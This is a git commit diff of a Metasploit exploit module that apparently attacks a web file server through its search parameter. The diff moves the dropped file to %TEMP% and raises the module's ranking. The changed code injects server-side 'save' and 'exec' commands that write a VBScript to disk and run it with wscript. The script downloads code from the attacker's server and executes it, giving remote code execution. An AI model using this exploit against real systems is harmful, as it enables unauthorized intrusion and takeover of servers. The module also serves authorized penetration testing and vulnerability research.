Use %TEMP% and update ranking
parent
d90fe4f724
commit
98b69e095c
|
@ -6,7 +6,7 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
@ -49,7 +49,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
|
||||
OptString.new('SAVE_PATH', [true, 'Target writable path', 'c:\\']),
|
||||
OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 10]),
|
||||
], self.class)
|
||||
end
|
||||
|
@ -86,6 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
file_name = rand_text_alpha(rand(10)+5)
|
||||
file_ext = '.vbs'
|
||||
file_full_name = file_name + file_ext
|
||||
vbs_path = "%TEMP%\\#{file_full_name}"
|
||||
|
||||
vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0a"
|
||||
vbs_code << "On Error Resume Next\x0d\x0a"
|
||||
|
@ -97,21 +97,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
vbs_code << "Execute x.responseText"
|
||||
|
||||
payloads = [
|
||||
"save|#{datastore['SAVE_PATH']}#{file_full_name}|#{vbs_code}",
|
||||
"exec|wscript.exe //B //NOLOGO #{datastore['SAVE_PATH']}#{file_full_name}"
|
||||
"save|#{vbs_path}|#{vbs_code}",
|
||||
"exec|wscript.exe //B //NOLOGO #{vbs_path}"
|
||||
]
|
||||
|
||||
print_status("Sending a malicious request to #{target_uri.path}")
|
||||
payloads.each do |payload|
|
||||
res = send_request_raw({
|
||||
send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => "/?search=%00{.#{URI::encode(payload)}.}"
|
||||
})
|
||||
if res
|
||||
print_status("#{res.code}\n#{res.body.to_s}")
|
||||
end
|
||||
end
|
||||
register_file_for_cleanup("#{datastore['SAVE_PATH']}#{file_full_name}")
|
||||
register_file_for_cleanup(vbs_path)
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
|
Loading…
Reference in New Issue